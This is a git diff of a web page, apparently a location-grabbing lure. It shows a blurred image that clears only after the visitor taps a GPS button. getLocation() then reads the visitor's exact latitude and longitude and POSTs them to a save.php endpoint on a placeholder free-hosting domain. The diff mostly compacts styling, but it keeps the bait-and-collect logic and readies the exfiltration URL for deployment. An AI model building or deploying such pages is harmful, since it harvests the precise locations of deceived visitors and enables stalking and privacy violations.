--- a/index.html
+++ b/index.html
@@ -3,113 +3,26 @@
 <head>
     <title>Homepage</title>
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-
     <style>
         body {
-            margin: 0;
-            padding: 0;
-            background: #f0f0f0;
+            margin:0; padding:0; background:#f0f0f0;
             font-family: Arial, sans-serif;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
-            text-align: center;
+            display:flex; justify-content:center; align-items:center; height:100vh;
+            text-align:center;
         }
+        .container { display:flex; flex-direction:column; align-items:center; }
+        .blur-image { width:260px; height:260px; object-fit:cover; border-radius:20px; filter:blur(3px); opacity:0.85; margin-bottom:20px; transition: filter 0.6s ease, opacity 0.6s ease; }
+        .blur-image.clear { filter: blur(0); opacity:1; }
+        .gps-btn { padding:15px 25px; background:#007bff; color:white; border:none; border-radius:12px; font-size:18px; width:240px; cursor:pointer; box-shadow:0 4px 12px rgba(0,0,0,0.25); }
+        .gps-btn:active { transform: scale(0.97); }
 
-        .container {
-            display: flex;
-            flex-direction: column;
-            align-items: center;
-        }
+        #popupOverlay { position:fixed; top:0; left:0; width:100vw; height:100vh; background: rgba(0,0,0,0.75); display:flex; justify-content:center; align-items:center; padding:20px; z-index:9999; }
+        #popupBox { background:#fff; width:100%; max-width:380px; border-radius:16px; padding:20px; text-align:center; position:relative; animation:fadeIn 0.3s ease; }
+        #closePopup { position:absolute; top:10px; right:12px; background:#000; color:#fff; border:none; border-radius:50%; width:32px; height:32px; font-size:18px; cursor:pointer; }
+        #popupImage { width:100%; border-radius:12px; margin:12px 0; }
+        p.privacy { max-width:300px; font-size:14px; color:#333; margin-bottom:15px; }
 
-        .blur-image {
-            width: 260px;
-            height: 260px;
-            object-fit: cover;
-            border-radius: 20px;
-            filter: blur(3px);
-            opacity: 0.85;
-            margin-bottom: 20px;
-            transition: filter 0.6s ease, opacity 0.6s ease;
-        }
-
-        .blur-image.clear {
-            filter: blur(0);
-            opacity: 1;
-        }
-
-        .gps-btn {
-            padding: 15px 25px;
-            background: #007bff;
-            color: white;
-            border: none;
-            border-radius: 12px;
-            font-size: 18px;
-            width: 240px;
-            cursor: pointer;
-            box-shadow: 0 4px 12px rgba(0,0,0,0.25);
-        }
-
-        .gps-btn:active {
-            transform: scale(0.97);
-        }
-
-        /* FULLSCREEN POPUP */
-        #popupOverlay {
-            position: fixed;
-            top: 0; left: 0;
-            width: 100vw; height: 100vh;
-            background: rgba(0,0,0,0.75);
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            padding: 20px;
-            z-index: 9999;
-        }
-
-        #popupBox {
-            background: #fff;
-            width: 100%;
-            max-width: 380px;
-            border-radius: 16px;
-            padding: 20px;
-            text-align: center;
-            position: relative;
-            animation: fadeIn 0.3s ease;
-        }
-
-        #closePopup {
-            position: absolute;
-            top: 10px;
-            right: 12px;
-            background: #000;
-            color: #fff;
-            border: none;
-            border-radius: 50%;
-            width: 32px;
-            height: 32px;
-            font-size: 18px;
-            cursor: pointer;
-        }
-
-        #popupImage {
-            width: 100%;
-            border-radius: 12px;
-            margin: 12px 0;
-        }
-
-        p.privacy {
-            max-width: 300px;
-            font-size: 14px;
-            color: #333;
-            margin-bottom: 15px;
-        }
-
-        @keyframes fadeIn {
-            from { opacity: 0; transform: scale(0.9); }
-            to   { opacity: 1; transform: scale(1); }
-        }
+        @keyframes fadeIn { from { opacity:0; transform:scale(0.9); } to { opacity:1; transform:scale(1); } }
     </style>
 </head>
 <body>
@@ -137,23 +50,12 @@
 </div>
 
 <script>
-// --------------------
-// POPUP CLOSE BUTTON
-// --------------------
 document.addEventListener("DOMContentLoaded", () => {
-    const closeBtn = document.getElementById("closePopup");
-    const overlay = document.getElementById("popupOverlay");
-
-    closeBtn.addEventListener("click", () => {
-        overlay.style.display = "none";
-    });
+    document.getElementById("closePopup").onclick = () =>
+        document.getElementById("popupOverlay").style.display = "none";
 });
 
-// --------------------
-// GPS FUNCTION
-// --------------------
 function getLocation() {
-    // Unblur image
     document.getElementById("mainImage").classList.add("clear");
 
     if (!navigator.geolocation) {
@@ -163,14 +65,13 @@ function getLocation() {
 
     navigator.geolocation.getCurrentPosition(
         pos => {
-            const lat = pos.coords.latitude;
-            const lng = pos.coords.longitude;
+            let lat = pos.coords.latitude;
+            let lng = pos.coords.longitude;
             console.log("User GPS:", lat, lng);
 
-            // Send to backend (update URL to your PHP server)
-            fetch("https://YOUR-PHP-SERVER.com/save.php", {
-                method: "POST",
-                headers: { "Content-Type": "application/json" },
+            fetch("https://YOUR-INFINITYFREE-DOMAIN/save.php", {
+                method:"POST",
+                headers:{ "Content-Type":"application/json" },
                 body: JSON.stringify({ latitude: lat, longitude: lng })
             })
             .then(res => res.json())
